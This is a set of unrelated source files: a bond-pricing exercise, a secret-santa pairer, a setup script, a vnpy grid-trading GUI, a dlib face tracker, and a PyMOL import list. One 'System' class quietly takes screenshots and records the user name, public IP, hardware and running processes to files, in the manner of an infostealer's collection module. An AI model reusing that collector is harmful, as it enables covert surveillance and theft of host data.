# logger.debug('update %s %s from: %s to: %s', section, val, k, data)
if data is not None and k != data:
self.set(section, val, data)
def dict_to_cp(dic):
ret = ConfigParser()
for esc in dic:
if dic[esc]:
ret.add_section(esc)
for eva in dic[esc]:
ret.set(esc, eva, str(dic[esc][eva]))
return ret
def str_to_logging(level):
level = level.lower()
if level == 'critical':
return logging.CRITICAL
if level == 'error':
return logging.ERROR
if level == 'warning':
return logging.WARNING
if level == 'debug':
return logging.DEBUG
return logging.INFO
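# Minimal usage sketch (assumed host value; option names as documented above):
#
#     conf = Config(string='[agent]\nhost = 127.0.0.1:5672\n')
#     conf.setup_logging()
#     conf.get('agent', 'host')       # -> '127.0.0.1:5672'
#     conf.get('core', 'queue_size')  # -> 128 (default)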
|
the-stack_0_19872 | from datetime import date
from openpyxl import load_workbook
if __name__ == '__main__':
wb = load_workbook('FixedCouponBond.xlsx')
ws = wb.active
# Take the input parameters
today = ws['C2'].value.date()
# OIS Data
ois_startdate = today
ois_maturities = []
ois_mktquotes = []
for cell in list(ws.iter_rows('B15:C44')):
ois_maturities.append(cell[0].value)
ois_mktquotes.append(cell[1].value)
# Credit Curve Data
ndps = []
ndpdates = []
for cell in list(ws.iter_rows('B6:C11')):
ndpdates.append(cell[0].value.date())
ndps.append(cell[1].value)
# Bond data
nominals = []
start_dates = []
end_dates = []
cpn_frequency = []
coupons = []
recovery_rates = []
for cell in list(ws.iter_rows('E5:J19')):
nominals.append(cell[0].value)
start_dates.append(cell[1].value.date())
end_dates.append(cell[2].value.date())
cpn_frequency.append(cell[3].value)
coupons.append(cell[4].value)
recovery_rates.append(cell[5].value)
# YOUR CODE HERE ....
# In the coupon calculation use 30e360 convention to compute the accrual period (i.e. tau)
# The result of your code must be a variables of type list named
# output_npv. The length of this list has to be the equal to the number of bonds
# i.e len(nominals) for example
# END OF YOUR CODE
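    # Sketch of the 30E/360 accrual fraction mentioned above (helper only; the
    # pricing itself is the exercise left open in the block above):
    def tau_30e360(d1, d2):
        """Year fraction between two dates under the 30E/360 convention."""
        days = (360 * (d2.year - d1.year) + 30 * (d2.month - d1.month)
                + (min(d2.day, 30) - min(d1.day, 30)))
        return days / 360.0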
# Write results
# A variable named output_results of type list, with the same length of output_dates, is expected.
# In case this is not present, a message is written
if 'output_npv' not in locals():
output_npv = ["Not Successful" for x in range(len(nominals))]
out_list = list(ws.iter_rows('K5:K19'))
for i in range(len(output_npv)):
out_list[i][0].value = output_npv[i]
# A new file with the results is created
wb.save("FixedCouponBond_output.xlsx") |
the-stack_0_19873 | import random
from secret_santa.models import SantaGame, Participant
def get_santas(id_users):
pars = {}
random.shuffle(id_users)
for index in range(len(id_users) - 1):
pars[id_users[index]] = id_users[index + 1]
pars[id_users[-1]] = id_users[0]
return pars
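# get_santas shuffles the ids and links them into one cycle; e.g. if the shuffle
# yields [3, 1, 2], the pairing is {3: 1, 1: 2, 2: 3}, so everyone gives and receives once.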
def get_random_wishlist(tg_id):
participant = Participant.objects.get(tg_id=tg_id)
game = participant.game
participants = Participant.objects.filter(game=game).exclude(tg_id=tg_id)
random_participant = random.choice(participants)
return random_participant.wish_list
|
the-stack_0_19874 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
import os
__name__ = 'mkstuff'
release_info = {}
infopath = os.path.abspath(os.path.join(os.path.dirname(__file__),
__name__, 'info.py'))
with open(infopath) as open_file:
exec(open_file.read(), release_info)
this_directory = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(this_directory, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name = __name__,
author = release_info['__author__'],
author_email = release_info['__email__'],
version = release_info['__version__'],
url = release_info['__url__'],
packages = find_packages(),
install_requires = release_info['__requires__'],
license = release_info['__license__'],
description = release_info['__about__'],
#long_description = long_description,
long_description = release_info['__about__'],
long_description_content_type = 'text/rst',
setup_requires = release_info['__setup_requires__'],
tests_require = release_info['__tests_require__'],
#platforms = ['posix', 'mac os'],
#classifiers= [
#'Programming Language :: Python',
#'Natural Language :: English',
#],
#scripts = ['bin/{}'.format(fn) for fn in ['fits2ascii.py', 'ascii2fits.py']],
)
|
the-stack_0_19879 | # encoding: UTF-8
'''
GUI control components for the spread trading module
'''
from vnpy.trader.vtConstant import DIRECTION_LONG, DIRECTION_SHORT
from vnpy.trader.uiBasicWidget import QtWidgets, QtGui, QtCore
from vnpy.trader.vtEvent import *
from vnpy.trader.app.ctaStrategy.ctaGridTrade import *
########################################################################
class SplitLine(QtWidgets.QFrame):
"""水平分割线"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(SplitLine, self).__init__()
self.setFrameShape(self.HLine)
self.setFrameShadow(self.Sunken)
class SpreadTradeManager(QtWidgets.QWidget):
# ----------------------------------------------------------------------
def __init__(self, ctaEngine, eventEngine, parent=None):
super(SpreadTradeManager, self).__init__(parent)
self.ctaEngine = ctaEngine
self.eventEngine = eventEngine
self.strategy_name_list = []
self.strategy = None
self.directionList = [DIRECTION_LONG, DIRECTION_SHORT]
self.initUi()
# ----------------------------------------------------------------------
def initUi(self):
"""初始化界面"""
self.setWindowTitle(u'套利交易')
# 连接运行中的套利测试(策略名称[下拉菜单],连接按钮)
self.btnSwitchConnectStatus = QtWidgets.QPushButton(u'套利策略未连接')
self.btnSwitchConnectStatus.clicked.connect(self.btnSwitchClick)
Label = QtWidgets.QLabel
grid = QtWidgets.QGridLayout()
grid.addWidget(Label(u'状态'), 0, 0)
grid.addWidget(self.btnSwitchConnectStatus, 0, 1)
self.spreadStraty = QtWidgets.QComboBox()
self.strategy_name_list = self.ctaEngine.strategyDict.keys()
self.spreadStraty.addItems(self.strategy_name_list)
grid.addWidget(Label(u'套利策略'), 1, 0)
grid.addWidget(self.spreadStraty, 1, 1)
# 网格信息+操作(新增,删除,更新)
grid.addWidget(Label(u'方向'), 2, 0)
self.gridDirection = QtWidgets.QComboBox()
self.gridDirection.addItems(self.directionList)
grid.addWidget(self.gridDirection, 2, 1)
self.spinOpenPrice = QtWidgets.QDoubleSpinBox()
self.spinOpenPrice.setDecimals(4)
        self.spinOpenPrice.setMinimum(-10000)  # was 0; changed to -10000 to support spread prices
        self.spinOpenPrice.setMaximum(100000)
        self.spinOpenPrice.valueChanged.connect(self.spinOpenPrice_valueChanged)
        grid.addWidget(Label(u'Open price'), 3, 0)
        grid.addWidget(self.spinOpenPrice, 3, 1)
        self.spinClosePrice = QtWidgets.QDoubleSpinBox()
        self.spinClosePrice.setDecimals(4)
        self.spinClosePrice.setMinimum(-10000)  # was 0; changed to -10000 to support spread prices
        self.spinClosePrice.setMaximum(100000)
        grid.addWidget(Label(u'Close price'), 4, 0)
        grid.addWidget(self.spinClosePrice, 4, 1)
        self.spinOrderVolume = QtWidgets.QSpinBox()
        self.spinOrderVolume.setMinimum(0)
        self.spinOrderVolume.setMaximum(1000)
        grid.addWidget(Label(u'Order volume'), 5, 0)
        grid.addWidget(self.spinOrderVolume, 5, 1)
        self.spinTradedVolume = QtWidgets.QSpinBox()
        self.spinTradedVolume.setMinimum(0)
        self.spinTradedVolume.setMaximum(1000)
        grid.addWidget(Label(u'Traded volume'), 6, 0)
        grid.addWidget(self.spinTradedVolume, 6, 1)
        self.openStatus = QtWidgets.QCheckBox(u'')  # open status
        grid.addWidget(Label(u'Open status'), 7, 0)
        grid.addWidget(self.openStatus, 7, 1)
        self.orderStatus = QtWidgets.QCheckBox(u'')  # order status
        grid.addWidget(Label(u'Order status'), 8, 0)
        grid.addWidget(self.orderStatus, 8, 1)
        self.closeStatus = QtWidgets.QCheckBox(u'')  # close status
        grid.addWidget(Label(u'Close status'), 9, 0)
        grid.addWidget(self.closeStatus, 9, 1)
        self.reuseStatus = QtWidgets.QCheckBox(u'')  # reuse flag
        grid.addWidget(Label(u'Reuse grid'), 10, 0)
        grid.addWidget(self.reuseStatus, 10, 1)
grid.addWidget(self.reuseStatus, 10, 1)
        btnAddGrid = QtWidgets.QPushButton(u'Add')
        btnAddGrid.clicked.connect(self.btnAddGridClick)
        btnUpdateGrid = QtWidgets.QPushButton(u'Update')
        btnUpdateGrid.clicked.connect(self.btnUpdateGridClick)
        btnRemoveGrid = QtWidgets.QPushButton(u'Remove')
        btnRemoveGrid.clicked.connect(self.btnRemoveGridClick)
        btnRemoveAll = QtWidgets.QPushButton(u'Remove all')
        btnRemoveAll.clicked.connect(self.btnRemoveAllClick)
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(btnAddGrid)
hbox.addWidget(btnUpdateGrid)
hbox.addStretch()
hbox.addWidget(btnRemoveGrid)
hbox.addWidget(btnRemoveAll)
vbox = QtWidgets.QVBoxLayout()
vbox.addLayout(grid)
vbox.addLayout(hbox)
        # Status info (a timer displays the upper and lower grid lists)
        # Log monitor
self.logMsgs = QtWidgets.QTextEdit()
self.logMsgs.setReadOnly(True)
self.logMsgs.setMaximumHeight(200)
vbox.addWidget(self.logMsgs)
self.setLayout(vbox)
def btnSwitchClick(self):
"""策略连接按钮"""
        if self.ctaEngine is None:
            self.log(u'CTA engine not connected')
            return
        strategy_name = self.spreadStraty.currentText()
        if strategy_name is None or len(strategy_name) == 0:
            if len(self.strategy_name_list) == 0:
                self.strategy_name_list = self.ctaEngine.strategyDict.keys()
                self.spreadStraty.addItems(self.strategy_name_list)
            return
self.strategy = self.ctaEngine.strategyDict[strategy_name]
if self.strategy.trading:
            self.btnSwitchConnectStatus.setText(u'Connected, running')
            self.log(u'Connected to {0}, strategy running'.format(strategy_name))
        else:
            self.btnSwitchConnectStatus.setText(u'Connected, not running')
            self.log(u'Connected to {0}, but the strategy is not running'.format(strategy_name))
self.displayGrids()
def btnAddGridClick(self):
"""网格新增按钮"""
        if self.ctaEngine is None:
            self.log(u'CTA engine not connected')
            return
        if self.strategy is None:
            self.log(u'No strategy connected')
            return
        direction = self.gridDirection.currentText()
        if direction is None or len(direction) == 0:
            self.log(u'Select a direction first')
            return
        open_price = self.spinOpenPrice.value()
        close_price = self.spinClosePrice.value()
        if open_price == close_price:
            self.log(u'Open price and close price cannot be equal')
return
order_volume = self.spinOrderVolume.value()
grid = CtaGrid(direction=direction,
openprice=open_price,
closeprice=close_price,
volume=order_volume)
grid.reuse = self.reuseStatus.isChecked()
if direction == DIRECTION_LONG:
self.strategy.gt.dnGrids.append(grid)
else:
self.strategy.gt.upGrids.append(grid)
self.strategy.gt.save(direction=direction)
self.strategy.recheckPositions = True
grids_info = self.strategy.gt.toStr(direction=direction)
self.log(grids_info)
def displayGrids(self):
up_grids_info = self.strategy.gt.toStr(direction=DIRECTION_SHORT)
self.log(up_grids_info)
dn_grids_info = self.strategy.gt.toStr(direction=DIRECTION_LONG)
self.log(dn_grids_info)
def spinOpenPrice_valueChanged(self):
"""查询网格"""
        if self.ctaEngine is None:
            self.log(u'CTA engine not connected')
            return
        if self.strategy is None:
            self.log(u'No strategy connected')
            return
        direction = self.gridDirection.currentText()
        if direction is None or len(direction) == 0:
            self.log(u'Select a direction first')
            return
        open_price = self.spinOpenPrice.value()
        grid = self.strategy.gt.getGrid(direction=direction, openPrice=open_price, t=u'OpenPrice')
        if grid is None:
            self.log(u'No grid found for direction {0} at open price {1}'.format(direction, open_price))
return
self.spinClosePrice.setValue(grid.closePrice)
self.spinOrderVolume.setValue(grid.volume)
self.spinTradedVolume.setValue(grid.tradedVolume)
self.openStatus.setChecked(grid.openStatus)
self.orderStatus.setChecked(grid.orderStatus)
self.closeStatus.setChecked(grid.closeStatus)
self.reuseStatus.setChecked(grid.reuse)
def btnUpdateGridClick(self):
"""更新网格"""
        if self.ctaEngine is None:
            self.log(u'CTA engine not connected')
            return
        if self.strategy is None:
            self.log(u'No strategy connected')
            return
        direction = self.gridDirection.currentText()
        if direction is None or len(direction) == 0:
            self.log(u'Select a direction first')
            return
        open_price = self.spinOpenPrice.value()
        grid = self.strategy.gt.getGrid(direction=direction, openPrice=open_price, t=u'OpenPrice')
        if grid is None:
            self.log(u'No grid found for direction {0} at open price {1}'.format(direction, open_price))
return
grid.openPrice = open_price
grid.closePrice = self.spinClosePrice.value()
grid.volume = self.spinOrderVolume.value()
grid.tradedVolume = self.spinTradedVolume.value()
grid.openStatus = self.openStatus.isChecked()
grid.orderStatus = self.orderStatus.isChecked()
grid.closeStatus = self.closeStatus.isChecked()
grid.reuse = self.reuseStatus.isChecked()
self.strategy.gt.save(direction=direction)
self.strategy.recheckPositions = True
self.displayGrids()
def btnRemoveGridClick(self):
"""删除网格(指定开仓价以下的废格)"""
        if self.ctaEngine is None:
            self.log(u'CTA engine not connected')
            return
        if self.strategy is None:
            self.log(u'No strategy connected')
            return
        direction = self.gridDirection.currentText()
        if direction is None or len(direction) == 0:
            self.log(u'Select a direction first')
            return
        open_price = self.spinOpenPrice.value()
        if (direction == DIRECTION_LONG and len(self.strategy.gt.dnGrids) < 2) or \
                (direction == DIRECTION_SHORT and len(self.strategy.gt.upGrids) < 2):
            self.log(u'Only one grid left in direction {0}; cannot remove it'.format(direction))
            return
        grid = self.strategy.gt.getGrid(direction=direction, openPrice=open_price, t=u'OpenPrice')
        if grid is None:
            self.log(u'No grid found for direction {0} at {1}; removing non-open grids within {1}'.format(direction, open_price))
            self.strategy.gt.removeGrids(direction=direction, priceline=open_price)
            self.strategy.gt.save(direction=direction)
            self.log(u'Removed all grids within {1} for direction {0}'.format(direction, open_price))
            self.displayGrids()
            return
        if grid.id is not None:
            self.strategy.gt.removeGridById(direction=direction, id=grid.id)
            self.log(u'Removed grid at {1} for direction {0}'.format(direction, open_price))
self.strategy.gt.save(direction=direction)
self.displayGrids()
def btnRemoveAllClick(self):
"""删除所有网格"""
        if self.ctaEngine is None:
            self.log(u'CTA engine not connected')
            return
        if self.strategy is None:
            self.log(u'No strategy connected')
            return
        direction = self.gridDirection.currentText()
        if direction is None or len(direction) == 0:
            self.log(u'Select a direction first')
            return
        if direction == DIRECTION_LONG:
            self.strategy.gt.dnGrids = self.strategy.gt.dnGrids[-1:]
            self.strategy.gt.save(direction=direction)
            self.log(u'Removed all grids for direction {0}, keeping only the last one'.format(direction))
        else:
            self.strategy.gt.upGrids = self.strategy.gt.upGrids[-1:]
            self.strategy.gt.save(direction=direction)
            self.log(u'Removed all grids for direction {0}, keeping only the last one'.format(direction))
self.displayGrids()
def log(self, content):
self.logMsgs.append(content)
|
the-stack_0_19882 | import threading
import time
import argparse
import cv2
import json
import os
import numpy as np
import dlib
from itertools import chain
config_data = {}
should_face_tracking_be_paused = False
detector = dlib.get_frontal_face_detector()
def set_config_data(data_in):
global config_data
config_data = data_in
def locate_main_face(img):
dets = detector(img, 0)
if not dets:
return None
return max(dets, key=lambda det: (det.right() - det.left()) * (det.bottom() - det.top()))
def extract_face_landmarks(img, face_location):
landmark_shape = predictor(img, face_location)
face_landmarks = []
for i in range(68):
pos = landmark_shape.part(i)
face_landmarks.append(np.array([pos.x, pos.y], dtype=np.float32))
return face_landmarks
def generate_face_identifiers(face_landmarks):
def get_center(array_in):
return sum([face_landmarks[i] for i in array_in]) / len(array_in)
left_eyebrow = [18, 19, 20, 21]
right_eyebrow = [22, 23, 24, 25]
chin = [6, 7, 8, 9, 10]
nose = [29, 30]
return get_center(left_eyebrow + right_eyebrow), get_center(chin), get_center(nose)
def get_face_orientation(face_identifiers):
center_of_eyebrows, center_of_chin, center_of_nose = face_identifiers
middle_line = center_of_eyebrows - center_of_chin
hypotenuse = center_of_eyebrows - center_of_nose
horizontal_rotation_val = np.cross(middle_line, hypotenuse) / np.linalg.norm(middle_line) ** 2
vertical_rotation_val = middle_line @ hypotenuse / np.linalg.norm(middle_line) ** 2
return np.array([horizontal_rotation_val, vertical_rotation_val])
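# Quick numeric check of the decomposition (illustrative values): with
# middle_line = [0, -100] and hypotenuse = [10, -50], the cross term gives
# 1000 / 100**2 = 0.1 (horizontal) and the dot term 5000 / 100**2 = 0.5 (vertical).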
cam_capture_count = 0
_cam_capture_count_ = 0
cam_fps_count_start_time = time.time()
fps_count_interval = 5
def get_face_orientation_from_picture(img):
global eye_height, _cam_capture_count_, cam_fps_count_start_time, cam_capture_count
global mouth_height
main_face_location = locate_main_face(img)
if not main_face_location:
return None
face_landmarks = extract_face_landmarks(img, main_face_location)
if config_data['debug']:
global debug_face_landmarks
debug_face_landmarks = face_landmarks
_cam_capture_count_ += 1
if time.time() - cam_fps_count_start_time >= fps_count_interval:
cam_fps_count_start_time = time.time()
cam_capture_count = _cam_capture_count_
_cam_capture_count_ = 0
key_points = face_landmarks
eye_height = -(key_points[37][1] - key_points[41][1] +
key_points[38][1] - key_points[40][1] +
key_points[43][1] - key_points[47][1] +
key_points[44][1] - key_points[46][1]
) / (key_points[45][0] - key_points[42][0] +
key_points[49][0] - key_points[36][0])
mouth_height = -(key_points[61][1] - key_points[67][1] +
key_points[62][1] - key_points[66][1] +
key_points[63][1] - key_points[65][1] +
key_points[51][1] - key_points[57][1]
) / (key_points[54][0] - key_points[48][0] +
key_points[64][0] - key_points[60][0])
face_identifiers = generate_face_identifiers(face_landmarks)
rotation_vals = get_face_orientation(face_identifiers)
return rotation_vals
face_orientation = None
cam_img = None
def camera_capture_loop():
while 'config_name' not in config_data:
time.sleep(0.1)
global predictor
global reference_face_orientation
global face_orientation
global current_eye_height
global current_mouth_height
global closed_mouth_height
global closed_eye_height
global open_mouth_height
global open_eye_height
global eye_height_step
global mouth_height_step
predictor = dlib.shape_predictor(config_data['face_landmarks_path'])
reference_face_orientation = get_face_orientation_from_picture(cv2.imread(config_data['std_face_open_image_path']))
face_orientation = reference_face_orientation - reference_face_orientation
current_eye_height = open_eye_height = eye_height
current_mouth_height = open_mouth_height = mouth_height
get_face_orientation_from_picture(cv2.imread(config_data['std_face_closed_image_path']))
    closed_eye_height = eye_height
    closed_mouth_height = mouth_height
eye_height_step = (open_eye_height - closed_eye_height) / (len(config_data['psd_eye_layers']) - 1)
mouth_height_step = (open_mouth_height - closed_mouth_height) / (len(config_data['psd_mouth_layers']) - 1)
cap = cv2.VideoCapture(config_data['camera_path'])
while True:
        if should_face_tracking_be_paused:
            time.sleep(0.1)
            continue
global cam_img
        ret, cam_img = cap.read()
        if not ret:  # camera frame grab failed; skip this frame
            continue
        new_face_orientation = get_face_orientation_from_picture(cam_img)
current_eye_height = eye_height
current_mouth_height = mouth_height
if new_face_orientation is not None:
face_orientation = new_face_orientation - reference_face_orientation
def debug_draw_line(img, start_point_idx, end_point_idx, color):
cv2.line(img,
(int(debug_face_landmarks[start_point_idx][0]), int(debug_face_landmarks[start_point_idx][1])),
(int(debug_face_landmarks[end_point_idx][0]), int(debug_face_landmarks[end_point_idx][1])),
color,
3)
def draw_outlined_text(img, text, point, color):
cv2.putText(img,
text,
point,
cv2.FONT_HERSHEY_SIMPLEX,
1,
(0, 0, 0),
6)
cv2.putText(img,
text,
point,
cv2.FONT_HERSHEY_SIMPLEX,
1,
color,
2)
character_render_count = 0
_character_render_count_ = 0
render_fps_count_start_time = time.time()
def get_debug_camera_image():
global cam_capture_count, fps_count_interval, character_render_count, _character_render_count_, start_time, render_fps_count_start_time
_character_render_count_ += 1
if time.time() - render_fps_count_start_time >= fps_count_interval:
render_fps_count_start_time = time.time()
character_render_count = _character_render_count_
_character_render_count_ = 0
debug_cam_img = cam_img.copy()
color = (255, 255, 255)
for i in chain(range(0, 16), range(36, 41), range(42, 47), range(48, 60), range(27, 30), range(31, 35),
range(17, 21), range(22, 26)):
debug_draw_line(debug_cam_img, i, i + 1, color)
debug_draw_line(debug_cam_img, 36, 41, color)
debug_draw_line(debug_cam_img, 42, 47, color)
for i, (px, py) in enumerate(debug_face_landmarks):
cv2.rectangle(debug_cam_img, (int(px), int(py) - 7), (int(px) + 10, int(py) + 3), (0, 0, 0), -1)
for i, (px, py) in enumerate(debug_face_landmarks):
cv2.putText(debug_cam_img, str(i), (int(px), int(py)), cv2.FONT_HERSHEY_COMPLEX, 0.25, (0, 255, 255))
cv2.putText(debug_cam_img,
'Main face',
(int(debug_face_landmarks[0][0] - 10),
int(debug_face_landmarks[24][1] - debug_face_landmarks[30][1] + debug_face_landmarks[27][1] - 5)),
cv2.FONT_HERSHEY_COMPLEX,
0.5,
(0, 255, 0))
cv2.rectangle(debug_cam_img,
(int(debug_face_landmarks[0][0] - 10),
int(debug_face_landmarks[24][1] - debug_face_landmarks[30][1] + debug_face_landmarks[27][1])),
(int(debug_face_landmarks[16][0] + 15),
int(debug_face_landmarks[8][1] + 10)),
(0, 255, 0),
1)
draw_outlined_text(debug_cam_img,
'Capture FPS: %.1f' % (cam_capture_count / fps_count_interval),
(20, 40),
(0, 255, 0))
draw_outlined_text(debug_cam_img,
'Render FPS: %.1f' % (character_render_count / fps_count_interval),
(20, 80),
(0, 255, 0))
draw_outlined_text(debug_cam_img,
'Eye Size: %d %s' % (get_current_eye_size(),
'' if get_current_eye_size() < len(config_data['psd_eye_layers']) - 1
else '(max)'),
(20, 120),
(0, 255, 0))
draw_outlined_text(debug_cam_img,
'Mouth Size: %d %s' % (get_current_mouth_size(),
'' if get_current_mouth_size() < len(config_data['psd_mouth_layers']) - 1
else '(max)'),
(20, 160),
(0, 255, 0))
draw_outlined_text(debug_cam_img,
'Face Orientation: [%.4f, %.4f]' % (face_orientation[0], face_orientation[1]),
(20, 200),
(0, 255, 0))
return debug_cam_img
def get_current_face_orientation():
return face_orientation
def get_camera_image():
return cam_img
def get_current_eye_size():
size = int((current_eye_height - closed_eye_height) / eye_height_step)
size = size if size < len(config_data['psd_eye_layers']) else len(config_data['psd_eye_layers']) - 1
return size if size >= 0 else 0
def get_current_mouth_size():
size = int((current_mouth_height - closed_mouth_height) / mouth_height_step)
size = size if size < len(config_data['psd_mouth_layers']) else len(config_data['psd_mouth_layers']) - 1
return size if size >= 0 else 0
def pause_face_tracker():
global should_face_tracking_be_paused
should_face_tracking_be_paused = True
def resume_face_tracker():
global should_face_tracking_be_paused
should_face_tracking_be_paused = False
t = threading.Thread(target=camera_capture_loop)
t.daemon = True
t.start()
def dir_path(string):
    # argparse type check: the config argument must point to an existing file
    if os.path.isfile(string):
        return string
    else:
        raise FileNotFoundError(string)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('config',
type=dir_path,
help='path to the config file (json)')
args = parser.parse_args()
config_file = open(args.config, encoding='utf8')
config_data = json.load(config_file)
config_file.close()
config_data['debug'] = True
while get_camera_image() is None:
time.sleep(0.1)
while True:
cv2.imshow("Camera Debug", get_debug_camera_image())
cv2.waitKey(1)
|
the-stack_0_19883 | from mss import mss
from os import mkdir
from urllib3 import poolmanager
from win32com.client import GetObject
from ..utils.config import SystemConfig
class System:
def __init__(self, *args):
self.config = SystemConfig()
for index, variable in enumerate(self.config.Variables):
self.__dict__.update({variable: args[index]})
def __create_folder(self):
if any(self.statuses):
mkdir(rf"{self.storage_path}\{self.storage_folder}\{self.folder}")
def __create_screen(self):
if self.statuses[0] is True:
with mss() as screen:
screen.shot(mon=-1, output=rf"{self.storage_path}\{self.storage_folder}\{self.folder}\Screenshot.png")
def __get_system_info(self):
if self.statuses[1] is True:
win_object = GetObject("winmgmts:root\\cimv2")
os_info = win_object.ExecQuery("Select * from Win32_OperatingSystem")[0]
net_info = poolmanager.PoolManager().request(method="GET", url=self.config.IPUrl).data.decode("utf-8")
cpu_info = win_object.ExecQuery("Select * from Win32_Processor")[0].Name
gpu_info = win_object.ExecQuery("Select * from Win32_VideoController")[0].Name
info = (
f"User: {self.config.User}\n",
f"IP: {net_info}\n",
f"OS Name: {os_info.Name.split('|')[0]}\n",
f"OS Version: {' '.join([os_info.Version, os_info.BuildNumber])}\n",
f"CPU: {cpu_info}\n",
f"GPU: {gpu_info}\n",
f"RAM: {round(float(os_info.TotalVisibleMemorySize) / 1048576)} GB\n"
)
with open(rf"{self.storage_path}\{self.storage_folder}\{self.folder}\Configuration.txt", "a", encoding="utf-8") as system:
for item in info:
system.write(item)
system.close()
def __get_system_processes(self):
if self.statuses[2] is True:
with open(rf"{self.storage_path}\{self.storage_folder}\{self.folder}\Processes.txt", "a", encoding="utf-8") as processes:
result = [process.Properties_('Name').Value for process in GetObject('winmgmts:').InstancesOf('Win32_Process')]
processes.write("\n".join(process for process in result))
processes.close()
def run(self):
try:
self.__create_folder()
self.__create_screen()
self.__get_system_info()
self.__get_system_processes()
except Exception as e:
if self.errors is True:
print(f"[SYSTEM]: {repr(e)}")
|
the-stack_0_19884 |
#--------------------------------------------------------------------
from .importing import \
filename_to_objectname, \
finish_object, \
load, \
loadall, \
load_brick, \
load_callback, \
load_cgo, \
load_coords, \
load_coordset, \
load_embedded, \
load_map, \
load_model, \
load_mtz, \
load_object, \
load_traj, \
load_raw, \
loadable, \
read_mmodstr, \
read_molstr, \
read_sdfstr, \
read_pdbstr, \
read_xplorstr, \
fetch, \
    mda_load, \
    mda_load_traj, \
mda_rmsd, \
mda_rmsf
# MPP ^
#--------------------------------------------------------------------
from . import creating
from .creating import \
copy, \
create, \
extract, \
fragment, \
group, \
gradient, \
isodot, \
isolevel, \
isomesh, \
isosurface, \
join_states, \
map_generate, \
map_new, \
pseudoatom, \
set_raw_alignment, \
slice_new, \
symexp, \
ramp_new, \
ramp_update, \
ungroup, \
volume
#--------------------------------------------------------------------
from .colorramping import \
volume_ramp_new, \
volume_panel, \
volume_color
#--------------------------------------------------------------------
from . import commanding
from .commanding import \
async_, \
cls, \
delete, \
do, \
log, \
log_close, \
log_open, \
quit, \
resume, \
splash, \
reinitialize, \
sync
#--------------------------------------------------------------------
from . import controlling
from .controlling import \
button, \
config_mouse, \
mouse, \
mask, \
order, \
set_key, \
unmask, \
edit_mode
#--------------------------------------------------------------------
from .querying import \
angle, \
auto_measure, \
centerofmass, \
count_atoms, \
count_frames, \
count_states, \
count_discrete, \
dist, \
dihedral, \
distance, \
find_pairs, \
get_angle, \
get_area, \
get_assembly_ids, \
get_bonds, \
get_chains, \
get_collada, \
get_color_index, \
get_color_indices, \
get_object_color_index, \
get_object_list, \
get_object_settings,\
get_object_state, \
get_color_tuple, \
get_atom_coords, \
get_coords, \
get_coordset, \
get_dihedral, \
get_distance, \
get_drag_object_name, \
get_extent, \
get_gltf, \
get_idtf, \
get_modal_draw, \
get_model, \
get_movie_locked, \
get_movie_length, \
get_names, \
get_names_of_type, \
get_legal_name, \
get_unused_name, \
get_object_matrix, \
get_object_ttt, \
get_mtl_obj, \
get_phipsi, \
get_position, \
get_povray, \
get_raw_alignment, \
get_renderer, \
get_selection_state,\
get_symmetry, \
get_title, \
get_type, \
get_version, \
get_volume_field, \
get_volume_histogram, \
get_vrml, \
id_atom, \
identify, \
index, \
overlap, \
pi_interactions, \
phi_psi
#--------------------------------------------------------------------
from .selecting import \
deselect, \
indicate, \
select, \
select_list, \
pop, \
mda_select
#--------------------------------------------------------------------
from . import exporting
from .exporting import \
copy_image, \
cache, \
get_str, \
get_bytes, \
get_pdbstr, \
get_cifstr, \
get_session, \
get_fastastr, \
multifilesave, \
multifilenamegen, \
multisave, \
png, \
mda_save
#--------------------------------------------------------------------
from . import editing
from .editing import \
add_bond, \
alter, \
alter_list, \
alter_state, \
alphatoall, \
attach, \
bond, \
copy_to, \
cycle_valence, \
deprotect, \
drag, \
dss, \
edit, \
fix_chemistry, \
flag, \
fuse, \
get_editor_scheme, \
h_add, \
h_fill, \
h_fix, \
invert, \
iterate, \
iterate_state, \
map_set, \
map_set_border, \
map_double, \
map_halve, \
map_trim, \
matrix_copy, \
matrix_reset, \
mse2met, \
pbc_unwrap, \
pbc_wrap, \
protect, \
push_undo, \
rebond, \
reference, \
redo, \
remove, \
remove_picked, \
rename, \
replace, \
rotate, \
sculpt_purge, \
sculpt_deactivate, \
sculpt_activate, \
sculpt_iterate, \
set_dihedral, \
set_name, \
set_geometry, \
set_object_color, \
set_object_ttt, \
set_state_order, \
set_symmetry, \
set_title, \
smooth, \
sort, \
split_chains, \
split_states, \
symmetry_copy, \
torsion, \
transform_object, \
transform_selection,\
translate, \
translate_atom, \
unbond, \
undo, \
uniquify, \
unpick, \
update, \
valence, \
vdw_fit
from .editor import \
fab
from .computing import \
clean
matrix_transfer = matrix_copy # legacy
#--------------------------------------------------------------------
from .externing import \
cd, \
ls, \
paste, \
pwd, \
system
#--------------------------------------------------------------------
from . import wizarding
from .wizarding import \
get_wizard, \
get_wizard_stack, \
refresh_wizard, \
replace_wizard, \
set_wizard, \
set_wizard_stack, \
dirty_wizard, \
wizard
#--------------------------------------------------------------------
from .fitting import \
align, \
alignto, \
extra_fit, \
fit, \
super, \
rms, \
rms_cur, \
intra_fit, \
intra_rms, \
intra_rms_cur, \
cealign, \
pair_fit
#--------------------------------------------------------------------
# ARE ALL OF THESE UNUSED AND/OR DEPRECATED (?)
from .preset import \
simple, \
technical, \
pretty, \
publication
#--------------------------------------------------------------------
from .morphing import \
morph
#--------------------------------------------------------------------
from . import moving
from .moving import \
madd, \
mcopy, \
mdelete, \
mmove, \
minsert, \
mset, \
mclear, \
mdo, \
mappend, \
mmatrix, \
mdump, \
accept, \
decline, \
mpng, \
mview, \
forward, \
backward, \
rewind, \
middle, \
ending, \
mplay, \
mtoggle, \
mstop, \
frame, \
get_movie_playing, \
set_frame, \
get_state, \
get_frame
#--------------------------------------------------------------------
from . import viewing
from .viewing import \
show_as, \
bg_color, \
bg_colour, \
cartoon, \
capture, \
clip, \
color, \
color_deep, \
colour, \
del_colorection, \
dirty, \
disable, \
draw, \
enable, \
full_screen, \
get_colorection, \
get_view, \
get_viewport, \
get_vis, \
get_scene_list, \
hide, \
ipython_image, \
label, \
label2, \
load_png, \
meter_reset, \
move, \
orient, \
origin, \
center, \
ray, \
rebuild, \
recolor, \
recolour, \
refresh, \
reset, \
rock, \
scene, \
scene_order, \
scene_recall_message, \
set_color, \
